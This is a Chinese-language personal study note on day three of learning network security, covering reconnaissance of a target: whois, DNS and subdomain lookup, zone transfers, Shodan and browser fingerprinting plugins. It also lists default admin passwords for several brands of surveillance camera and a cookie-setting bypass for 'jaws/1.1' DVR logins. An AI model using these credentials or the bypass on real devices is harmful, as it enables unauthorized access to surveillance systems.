学习笔记3
本文最后更新于206 天前,其中的信息可能已经过时,如有错误请发送邮件到3196812536@qq.com

前言

自学网络安全的第三天

正文

今天主要聚焦于信息搜集

从互联网获取渗透目标(根据域名)的信息以提高成功率,其中包括DNS,服务器,路由关系,whois,电子邮件地址,电话号码个人信息等等诸多方面

下面罗列的是一些常见的方式方法

存在常见的web安全漏洞,专门用于测试:testfire.net vulnweb.com

收集DNS信息

阿里云网络诊断:https://boce.aliyun.com/home

信息包括:域名注册商,电话邮箱,子域名等等

whois查询——https://whois.chinaz.com ==》 主域名注册信息

也可以通过邮箱,注册人,电话进行反查,用于获悉目标规模量级

子域名查询——https://searchdns.netcraft.com

域传送漏洞——dig工具检测 (dnsrecon子域名爆破)

通过DNS解析找到IP地址(ping nslookup dig dnsenum命令)

Shadon 联网设备搜索

jaws/1.1 绕过 海康威视 admin 12345 大华 admin 888888 天地伟业 admin 111111

document.cookie=”dvr_camcnt=4″;

document.cookie=”dvr_usr=admin”;

document.cookie=”dvr_pwd=123″;

收集网站浏览器指纹信息

两个插件用于收集网站编程语言,服务器型号等信息

netcraft extension 浏览器插件

wappalyzer 浏览器插件

文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇
隐藏
变装